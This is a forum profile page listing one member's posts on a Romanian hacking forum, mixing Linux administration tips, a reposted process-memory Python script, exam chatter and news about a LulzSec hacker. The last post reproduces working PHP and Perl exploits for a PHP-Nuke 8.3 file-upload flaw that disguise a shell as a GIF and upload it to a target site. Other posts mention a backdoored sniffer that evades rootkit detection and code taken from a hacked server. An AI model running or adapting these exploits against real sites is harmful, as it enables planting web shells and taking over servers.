Everything posted by Zatarra

  1. If you have SELinux enabled, no matter what you do you can't share just anywhere. You have to run one of these 2 commands for a temporary solution:

         setsebool -P samba_export_all_rw on   # for rw permissions on the share
         setsebool -P samba_export_all_ro on   # for ro permissions on the share

     And one of these 2 for a permanent solution:

         echo "samba_export_all_rw=1" >> /etc/selinux/config   # for rw permissions on the share
         echo "samba_export_all_ro=1" >> /etc/selinux/config   # for ro permissions on the share

     I went into more detail here: http://rstcenter.com/forum/35818-linux-sharing-using-samba.rst
  2. I had big problems with SELinux when I was implementing Samba, because it doesn't let you share folders with arbitrary paths, only /home, /tmp and things like that. You can find more details here:
  3. 1. I don't recommend turning off SELinux.
     2. ls -l /etc/rc.d/rc3.d/S* shows only the ones in runlevel 3.
     3. chkconfig --list, not plain chkconfig.
     4. Regarding rootkits, I have a sniffer with a backdoor included that isn't detected by RK Hunter; even so, it remains a good anti-rootkit.
     5. I second the part about clamav.
     6. I would add some more security using TCPWrappers (possible help here).
     7. Bravo for the tutorial, +1 because it was made by you.
     8. I hope you keep it up, with as many tutorials of this kind as possible.
  4. You're a shemale! On topic: Yes, as Nytro said - there were, there are and there will be
  5. Only on Linux and on FreeBSD

         uname=os.uname()
         if uname[0]=="FreeBSD":
             proc="/compat/linux/proc/"
         else:
             proc="/proc/"
  6. I didn't know what title to give it. I'll be as brief as possible: the program tells you how much memory each process uses; it's very nice.

         #!/usr/bin/env python

         # Try to determine how much RAM is currently being used per program.
         # Note per _program_, not per process. So for example this script
         # will report RAM used by all httpd process together. In detail it reports:
         # sum(private RAM for program processes) + sum(Shared RAM for program processes)
         # The shared RAM is problematic to calculate, and this script automatically
         # selects the most accurate method available for your kernel.

         # Author: P@draigBrady.com
         # Source: http://www.pixelbeat.org/scripts/ps_mem.py

         # V1.0  06 Jul 2005  Initial release
         # V1.1  11 Aug 2006  root permission required for accuracy
         # V1.2  08 Nov 2006  Add total to output
         #                    Use KiB,MiB,... for units rather than K,M,...
         # V1.3  22 Nov 2006  Ignore shared col from /proc/$pid/statm for
         #                    2.6 kernels up to and including 2.6.9.
         #                    There it represented the total file backed extent
         # V1.4  23 Nov 2006  Remove total from output as it's meaningless
         #                    (the shared values overlap with other programs).
         #                    Display the shared column. This extra info is
         #                    useful, especially as it overlaps between programs.
         # V1.5  26 Mar 2007  Remove redundant recursion from human()
         # V1.6  05 Jun 2007  Also report number of processes with a given name.
         #                    Patch from riccardo.murri@gmail.com
         # V1.7  20 Sep 2007  Use PSS from /proc/$pid/smaps if available, which
         #                    fixes some over-estimation and allows totalling.
         #                    Enumerate the PIDs directly rather than using ps,
         #                    which fixes the possible race between reading
         #                    RSS with ps, and shared memory with this program.
         #                    Also we can show non truncated command names.
         # V1.8  28 Sep 2007  More accurate matching for stats in /proc/$pid/smaps
         #                    as otherwise could match libraries causing a crash.
         #                    Patch from patrice.bouchand.fedora@gmail.com
         # V1.9  20 Feb 2008  Fix invalid values reported when PSS is available.
         #                    Reported by Andrey Borzenkov <arvidjaar@mail.ru>
         # V2.4  06 Mar 2011
         #   http://github.com/pixelb/scripts/commits/master/scripts/ps_mem.py

         # Notes:
         #
         # All interpreted programs where the interpreter is started
         # by the shell or with env, will be merged to the interpreter
         # (as that's what's given to exec). For e.g. all python programs
         # starting with "#!/usr/bin/env python" will be grouped under python.
         # You can change this by using the full command line but that will
         # have the undesirable affect of splitting up programs started with
         # differing parameters (for e.g. mingetty tty[1-6]).
         #
         # For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels
         # (rmap vm without smaps) it can not be accurately determined how many pages
         # are shared between processes in general or within a program in our case:
         # http://lkml.org/lkml/2005/7/6/250
         # A warning is printed if overestimation is possible.
         # In addition for 2.6 kernels up to 2.6.9 inclusive, the shared
         # value in /proc/$pid/statm is the total file-backed extent of a process.
         # We ignore that, introducing more overestimation, again printing a warning.
         # Since kernel 2.6.23-rc8-mm1 PSS is available in smaps, which allows
         # us to calculate a more accurate value for the total RAM used by programs.
         #
         # Programs that use CLONE_VM without CLONE_THREAD are discounted by assuming
         # they're the only programs that have the same /proc/$PID/smaps file for
         # each instance. This will fail if there are multiple real instances of a
         # program that then use CLONE_VM without CLONE_THREAD, or if a clone changes
         # its memory map while we're checksumming each /proc/$PID/smaps.
         #
         # I don't take account of memory allocated for a program
         # by other programs. For e.g. memory used in the X server for
         # a program could be determined, but is not.
         #
         # FreeBSD is supported if linprocfs is mounted at /compat/linux/proc/
         # FreeBSD 8.0 supports up to a level of Linux 2.6.16

         import sys, os, errno, string

         try:
             # md5 module is deprecated on python 2.6
             # so try the newer hashlib first
             import hashlib
             md5_new = hashlib.md5
         except ImportError:
             import md5
             md5_new = md5.new

         # The following exits cleanly on Ctrl-C or EPIPE
         # while treating other exceptions as before.
         def std_exceptions(etype, value, tb):
             sys.excepthook=sys.__excepthook__
             if issubclass(etype, KeyboardInterrupt):
                 pass
             elif issubclass(etype, IOError) and value.errno == errno.EPIPE:
                 pass
             else:
                 sys.__excepthook__(etype, value, tb)
         sys.excepthook=std_exceptions

         if os.geteuid() != 0:
             sys.stderr.write("Sorry, root permission required.\n");
             if __name__ == '__main__':
                 sys.stderr.close()
                 sys.exit(1)

         uname=os.uname()
         if uname[0]=="FreeBSD":
             proc="/compat/linux/proc/"
         else:
             proc="/proc/"

         split_args=False
         if len(sys.argv)==2 and sys.argv[1] == "--split-args":
             split_args = True

         PAGESIZE=os.sysconf("SC_PAGE_SIZE")/1024 #KiB
         our_pid=os.getpid()

         #(major,minor,release)
         def kernel_ver():
             kv=open(proc+"sys/kernel/osrelease", "rt").readline().split(".")[:3]
             for char in "-_":
                 kv[2]=kv[2].split(char)[0]
             return (int(kv[0]), int(kv[1]), int(kv[2]))

         try:
             kv=kernel_ver()
         except (IOError, OSError):
             # sys.exc_info() is used instead of "except X, value" so that
             # the script parses on both Python 2 and Python 3
             value = sys.exc_info()[1]
             if value.errno == errno.ENOENT:
                 sys.stderr.write(
                   "Couldn't access /proc\n"
                   "Only GNU/Linux and FreeBSD (with linprocfs) are supported\n")
                 sys.exit(2)
             else:
                 raise

         have_pss=0

         #return Private,Shared
         #Note shared is always a subset of rss (trs is not always)
         def getMemStats(pid):
             global have_pss
             mem_id = pid #unique
             Private_lines=[]
             Shared_lines=[]
             Pss_lines=[]
             Rss=int(open(proc+str(pid)+"/statm", "rt").readline().split()[1])*PAGESIZE
             if os.path.exists(proc+str(pid)+"/smaps"): #stat
                 digester = md5_new()
                 for line in open(proc+str(pid)+"/smaps", "rb").readlines(): #open
                     # Note we checksum smaps as maps is usually but
                     # not always different for separate processes.
                     digester.update(line)
                     line = line.decode("ascii")
                     if line.startswith("Shared"):
                         Shared_lines.append(line)
                     elif line.startswith("Private"):
                         Private_lines.append(line)
                     elif line.startswith("Pss"):
                         have_pss=1
                         Pss_lines.append(line)
                 mem_id = digester.hexdigest()
                 Shared=sum([int(line.split()[1]) for line in Shared_lines])
                 Private=sum([int(line.split()[1]) for line in Private_lines])
                 #Note Shared + Private = Rss above
                 #The Rss in smaps includes video card mem etc.
                 if have_pss:
                     pss_adjust=0.5 #add 0.5KiB as this average error due to truncation
                     Pss=sum([float(line.split()[1])+pss_adjust for line in Pss_lines])
                     Shared = Pss - Private
             elif (2,6,1) <= kv <= (2,6,9):
                 Shared=0 #lots of overestimation, but what can we do?
                 Private = Rss
             else:
                 Shared=int(open(proc+str(pid)+"/statm", "rt").readline().split()[2])
                 Shared*=PAGESIZE
                 Private = Rss - Shared
             return (Private, Shared, mem_id)

         def getCmdName(pid):
             cmdline = open(proc+"%d/cmdline" % pid, "rt").read().split("\0")
             if cmdline[-1] == '' and len(cmdline) > 1:
                 cmdline = cmdline[:-1]
             path = os.path.realpath(proc+"%d/exe" % pid) #exception for kernel threads
             if split_args:
                 return " ".join(cmdline)
             if path.endswith(" (deleted)"):
                 path = path[:-10]
                 if os.path.exists(path):
                     path += " [updated]"
                 else:
                     #The path could have prelink stuff so try cmdline
                     #which might have the full path present. This helped for:
                     #/usr/libexec/notification-area-applet.#prelink#.fX7LCT (deleted)
                     if os.path.exists(cmdline[0]):
                         path = cmdline[0] + " [updated]"
                     else:
                         path += " [deleted]"
             exe = os.path.basename(path)
             cmd = open(proc+"%d/status" % pid, "rt").readline()[6:-1]
             if exe.startswith(cmd):
                 cmd=exe #show non truncated version
                 #Note because we show the non truncated name
                 #one can have separated programs as follows:
                 #584.0 KiB + 1.0 MiB = 1.6 MiB mozilla-thunder (exe -> bash)
                 # 56.0 MiB + 22.2 MiB = 78.2 MiB mozilla-thunderbird-bin
             return cmd

         cmds={}
         shareds={}
         mem_ids={}
         count={}
         for pid in os.listdir(proc):
             if not pid.isdigit():
                 continue
             pid = int(pid)
             if pid == our_pid:
                 continue
             try:
                 cmd = getCmdName(pid)
             except:
                 #permission denied or
                 #kernel threads don't have exe links or
                 #process gone
                 continue
             try:
                 private, shared, mem_id = getMemStats(pid)
             except:
                 continue #process gone
             if shareds.get(cmd):
                 if have_pss: #add shared portion of PSS together
                     shareds[cmd]+=shared
                 elif shareds[cmd] < shared: #just take largest shared val
                     shareds[cmd]=shared
             else:
                 shareds[cmd]=shared
             cmds[cmd]=cmds.setdefault(cmd,0)+private
             if cmd in count:
                 count[cmd] += 1
             else:
                 count[cmd] = 1
             mem_ids.setdefault(cmd,{}).update({mem_id:None})

         #Add shared mem for each program
         total=0
         for cmd in cmds:
             cmd_count = count[cmd]
             if len(mem_ids[cmd]) == 1 and cmd_count > 1:
                 # Assume this program is using CLONE_VM without CLONE_THREAD
                 # so only account for one of the processes
                 cmds[cmd] /= cmd_count
                 if have_pss:
                     shareds[cmd] /= cmd_count
             cmds[cmd]=cmds[cmd]+shareds[cmd]
             total+=cmds[cmd] #valid if PSS available

         if sys.version_info >= (2, 6):
             sort_list = sorted(cmds.items(), key=lambda x:x[1])
         else:
             sort_list = cmds.items()
             sort_list.sort(lambda x,y:cmp(x[1],y[1]))
         # list wrapping is redundant on <py3k, needed for >=pyk3 however
         sort_list=list(filter(lambda x:x[1],sort_list)) #get rid of zero sized processes

         #The following matches "du -h" output
         #see also human.py
         def human(num, power="Ki"):
             powers=["Ki","Mi","Gi","Ti"]
             while num >= 1000: #4 digits
                 num /= 1024.0
                 power=powers[powers.index(power)+1]
             return "%.1f %s" % (num,power)

         def cmd_with_count(cmd, count):
             if count>1:
                 return "%s (%u)" % (cmd, count)
             else:
                 return cmd

         if __name__ == '__main__':
             sys.stdout.write(" Private + Shared = RAM used\tProgram \n\n")
             for cmd in sort_list:
                 sys.stdout.write("%8sB + %8sB = %8sB\t%s\n" % (human(cmd[1]-shareds[cmd[0]]),
                                                   human(shareds[cmd[0]]), human(cmd[1]),
                                                   cmd_with_count(cmd[0], count[cmd[0]])))
             if have_pss:
                 sys.stdout.write("%s\n%s%8sB\n%s\n" % ("-" * 33,
                     " " * 24, human(total), "=" * 33))
             sys.stdout.write("\n Private + Shared = RAM used\tProgram \n\n")
             # We must close explicitly, so that any EPIPE exception
             # is handled by our excepthook, rather than the default
             # one which is reenabled after this script finishes.
             sys.stdout.close()

         #Warn of possible inaccuracies
         #2 = accurate & can total
         #1 = accurate only considering each process in isolation
         #0 = some shared mem not reported
         #-1= all shared mem not reported
         def shared_val_accuracy():
             """http://wiki.apache.org/spamassassin/TopSharedMemoryBug"""
             if kv[:2] == (2,4):
                 if open(proc+"meminfo", "rt").read().find("Inact_") == -1:
                     return 1
                 return 0
             elif kv[:2] == (2,6):
                 pid = str(os.getpid())
                 if os.path.exists(proc+pid+"/smaps"):
                     if open(proc+pid+"/smaps", "rt").read().find("Pss:")!=-1:
                         return 2
                     else:
                         return 1
                 if (2,6,1) <= kv <= (2,6,9):
                     return -1
                 return 0
             else:
                 return 1

         if __name__ == '__main__':
             vm_accuracy = shared_val_accuracy()
             if vm_accuracy == -1:
                 sys.stderr.write(
                  "Warning: Shared memory is not reported by this system.\n"
                 )
                 sys.stderr.write(
                  "Values reported will be too large, and totals are not reported\n"
                 )
             elif vm_accuracy == 0:
                 sys.stderr.write(
                  "Warning: Shared memory is not reported accurately by this system.\n"
                 )
                 sys.stderr.write(
                  "Values reported could be too large, and totals are not reported\n"
                 )
             elif vm_accuracy == 1:
                 sys.stderr.write(
                  "Warning: Shared memory is slightly over-estimated by this system\n"
                  "for each program, so totals are not reported.\n"
                 )
             sys.stderr.close()

     Source: a hacked server, but according to the description it's supposedly also here
  7. My check would be roughly this:

         <?php
         $i=2; // Initialize i to 2 because the first check takes place after calling the function twice
         $check=hash('crc32','a'); // Keep the first value (for the if)
         $crack=hash('crc32','a'); // Initialize the first value outside the while loop
         while (1)
         {
             $crack=hash('crc32',$crack); // Call the function
             // Strict comparison, so hex strings such as "0e123456" are compared as strings and not as numbers
             if ($crack===$check) {echo $i;break;} // Print the counter
             $i++; // The counter
         }
         ?>

     I'll leave a server computing to see whether it reaches a result, but I don't think it will.
  8. Is this the one the Iranians were attacked with back then? The one that wrecked their equipment at the nuclear plants, or whatever the hell kind of plants they have. @UserPi good observation
  9. Zatarra

    Bac 2011

    Say thanks.. congratulations anyway
  10. The story of Ryan, the autistic hacker, is strange to say the least. The young man lives completely isolated from the real world. He almost never leaves his house. He would spend entire weeks in front of the computer, in his room, with the curtains drawn, the only light in the room being that of the computer. Not even his mother disturbs him. She always leaves food at his door.

      Living so isolated from the world, nobody would have thought that Ryan could have a girlfriend. But he does: Amy Chapman, aged 19. The two have a thoroughly unusual relationship. They don't go out on the town, to the movies or for walks in the park. They spend all their time in front of the computer, surfing the internet, shut in the young man's room. Their relationship unfolds in a digital world, a world in which the two lovers feel at ease and can do whatever they want.

      "We are faithful to each other because we don't know anyone else. If he wanted to meet another girl, I would encourage him. I'm not jealous at all," the hacker's girlfriend said. "I don't like the term girlfriend. Let's say we fulfil all of each other's sexual needs," the girl added. Ryan has never bought her a present for her birthday or for Christmas. The only gift he has given her was a hard disk for the computer.

      Ryan ended up before the courts accused of breaking into the websites of several official agencies in the US and England. Because he is autistic, Judge Nicholas Evans decided to release Cleary on bail. However, he is not allowed to access the internet during this period. Ryan's case recalls that of another Englishman, Gary McKinnon, who suffers from the same condition and who could be extradited to the US after attacking US military computers.

      Cleary is charged with attacking, among others, the website of SOCA (Serious Organised Crime Agency). He is accused of plotting the construction of a "Botnet" network, to infect computers with viruses. In addition, he admitted that he managed to break the security systems of NASA and the Pentagon, but said he only wanted to look for proof that aliens exist.

      Cleary is part of LulzSec, a group that became known through attacks on the video game sites of Sony and Nintendo and which also claimed attacks on the American public television channel PBS, on the Sony company, on the Fox TV channel, on some pornographic sites, on the FBI, the CIA and the American government. The hackers also targeted the websites of the Brazilian presidency and government, as well as those of the British police.

      A new hearing in Ryan's case will take place next month. Amy will be by his side in court.

      Source: "I couldn't cheat on her. I don't know anyone else." The story of the autistic hacker, www.stirileprotv.ro
  11. Zatarra

    Bac 2011

    They haven't been posted for the person I'm interested in
  12. Zatarra

    Bac 2011

    When are the results posted?
  13. Zatarra

    test

    Kw3, I hope that's you moving around here, the damn thing actually works
  14. Zatarra

    Will it work?

    Kw3, can't sleep, so you decided to rack your brain over the chat? At least make sure your throat isn't dry
  15. Welcome. First of all, I'd ask you to take a look at the rules that govern this place (more or less). Secondly, I'd ask you to post any question you have, or even any information you hold in your area of interest; you never know what we might learn from you. As a small piece of advice, make sure that what you post hasn't already been posted. I hope you stay with us and contribute what you can to the community.
  16. Look here, the first 2 pages of articles:

      Copied:
      http://blog.spargetot.ro/google-un-rival-pentru-facebook/
      http://blog.spargetot.ro/numarul-utilizatorilor-de-internet-in-romania/
      http://blog.spargetot.ro/japonezii-au-creat-un-calculator-cu-68-544-procesoare/
      http://blog.spargetot.ro/laptop-sony-vaio-z/
      http://blog.spargetot.ro/pozezi-acum-focalizezi-mai-tarziu/
      http://blog.spargetot.ro/apple-ipad-2-va-fi-lansat-vineri-oficial-in-romania/
      http://blog.spargetot.ro/incet-incet-o-sa-scapam-de-grija-driverelor/
      http://blog.spargetot.ro/trabant-acoperit-cu-gazon/
      http://blog.spargetot.ro/facebook-pierde-milioane-de-utilizatori/
      http://blog.spargetot.ro/samsung-mai-tare-ca-nokia-si-apple-la-smartphone-uri/
      http://blog.spargetot.ro/repeat-pe-youtube-la-nesfarsit/
      http://blog.spargetot.ro/ios-5-te-poate-transforma-in-magician/
      http://blog.spargetot.ro/urmatorul-playstation-portable-se-va-numi-ps-vita/
      http://blog.spargetot.ro/se-copiaza-sau-nu-la-bacalaureat-2011/
      http://blog.spargetot.ro/microsoft-a-prezentat-in-detaliu-sistemul-de-operare-windows-8-video/
      http://blog.spargetot.ro/ce-tastatura-au-cei-de-la-cancan/
      http://blog.spargetot.ro/patinoarul-flamaropol-va-fi-daramat/
      http://blog.spargetot.ro/radiatiile-de-la-telefoanele-celulare-pot-cauza-cancerul/
      http://blog.spargetot.ro/powermat-solutia-wireless-pentru-incarcarea-gadgeturilor-tale/
      http://blog.spargetot.ro/apacer-lanseaza-stick-usb-3-0/
      http://blog.spargetot.ro/verbatim-blu-ray-bd-r-tip-lth-de-25gb/
      http://blog.spargetot.ro/se-lungesc-vacantele-scoala-nu-mai-incepe-pe-15-septembrie/
      http://blog.spargetot.ro/asocierea-numarului-11-cu-atentatele-din-11-septembrie-2001/
      http://blog.spargetot.ro/genius-ring-mouse-un-nou-mod-de-a-da-click/
      http://blog.spargetot.ro/tableta-htc-flyer-este-disponibila-si-in-romania/

      Yours:
      http://blog.spargetot.ro/ce-o-sa-reziste-mult-si-bine-pe-internet/
      http://blog.spargetot.ro/protectie-web-pentru-android-incepem-sa-avem-nevoie-de-asa-ceva/
      http://blog.spargetot.ro/ce-poti-sa-patesti-daca-cumperi-hdd-din-targ/
      http://blog.spargetot.ro/hahaha-fac-glume-cei-de-la-realitatea-net/

      Let me tell you a proverb: I'm sick of proving to people like you how pathetic they are. All the best!
  17. You don't know what you're talking about.. vi is the foundation of everything that means UNIX. You find it in any type of shell, on any type of UNIX; I for one adore it. It has loads of shortcuts, which of course you have to know, and loads of advantages. It's true that at first it gives you a headache, but if you know how to read up on it you get the hang of it easily. BTW: This thread really sucks, and sucks badly.. commands thrown around at random.. I hope no more "little hackers" of this kind turn up.
  18. Fine, you might steal a phone, a baby stroller, but the wheels off a car?
  19. You're wrong, it uses the one you have set as default. If you don't believe it, try a script like this:

          <?php
          echo $_SERVER['HTTP_USER_AGENT'] . "\n\n";
          $browser = get_browser(null, true);
          print_r($browser);
          ?>
  20. Zatarra

    Hello

    Hello and welcome. As wildchild said, I too advise you to ask any kind of question you have, crazy or not, without holding back. And yes, it's true, on the forum we also have examples of "how not to do it", but there are also many people with vast knowledge in certain areas, and if you have a problem they will help you. I hope you too will contribute what you can to the community; any initiative of your own is looked on favourably.
  21. Warning: curl_setopt() [function.curl-setopt]: Invalid curl configuration option in /home/net/public_html/*****/do_xss_scanner.php on line 121
      Warning: curl_setopt() [function.curl-setopt]: Invalid curl configuration option in /home/net/public_html/*****/do_sqli_scanner.php on line 155

      You still have bugs.
      Edit: @pr00f thanks, I hadn't noticed.
      Edit2: Do you really think the guys are such geniuses? I think it's easier to decrypt the hashes
  22. It's awesome; a banner change would be welcome, but for now I say we brainstorm the idea some more, maybe we'll come up with something really wicked. P.S. ;-)
  23. PHP exploit:

          <?php
          ///////////////////////////////////////////////////
          #Iranian Pentesters Home
          #PHP Nuke 8.3 MT AFU Vulnerability
          #Coded by:4n0nym0us & b3hz4d
          #http://www.pentesters.ir
          ///////////////////////////////////////////////////

          //Settings:
          $address = 'http://your-target.com';
          $file = 'shell.php.01';
          $prefix='pentesters_';

          //Exploit:
          @$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00";
          @$file_data .= file_get_contents($file);
          file_put_contents($prefix . $file, $file_data);
          $file = $prefix . $file;
          echo "\n" . "///////////////////////////////////" ."\n";
          echo " Iranian Pentesters Home" . "\n";
          echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n";
          echo "///////////////////////////////////" ."\n";
          $address_c = $address . '/includes/richedit/upload.php';
          $postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1");
          $data = post_data($address_c, $postdata);
          $start = strpos($data, "<img src=\"upload");
          if ($start != null)
          {
              $data = substr($data,$start + 10);
              $end = strpos($data, "\"");
              $data = substr($data,0,$end);
              echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n";
          }
          else
              echo "\n" . "Upload Failed!!!";

          function post_data($address, $data)
          {
              $curl = curl_init($address);
              curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)");
              curl_setopt($curl, CURLOPT_POST, 1);
              curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
              curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
              curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
              $content = curl_exec($curl);
              curl_close($curl);
              return $content;
          }
          ?>

      PERL exploit

          #!/usr/bin/perl
          ###################################################
          #//Iranian Pentesters Home
          #//PHP Nuke 8.3 MT AFU Vulnerability
          #//Coded by:4n0nym0us & b3hz4d
          #//http://www.pentesters.ir
          ###################################################

          use LWP;
          use HTTP::Request::Common;

          print "\n" . "///////////////////////////////////" ."\n";
          print " Iranian Pentesters Home" . "\n";
          print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n";
          print "///////////////////////////////////" ."\n";
          print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n";

          my $url = $ARGV[0]."/includes/richedit/upload.php";
          my $filename = $ARGV[1];
          my $prefix = $ARGV[2];
          my $rfile = $prefix . $filename . ".gif";

          open fhandle, $ARGV[1] or die $!;
          while (<fhandle>){
              $shell .= $_;
          }
          close fhandle;

          open fhandle, ">", $rfile or die $!;
          print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell;
          close(fhandle);

          my $ua = LWP::UserAgent->new;
          $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026");
          my $req = POST $url, Content_Type => 'form-data',
              Content => [ upload => "1", path => 'images', pwd => "1", userfile => [ $rfile,$prefix . $filename ] ];
          my $res = $ua->request($req);
          $between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12);
          print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between);
          exit;

      Source: PHP Nuke 8.3 MT Shell Upload ≈ Packet Storm
      Video: Download - 213.mp4 - Persiangig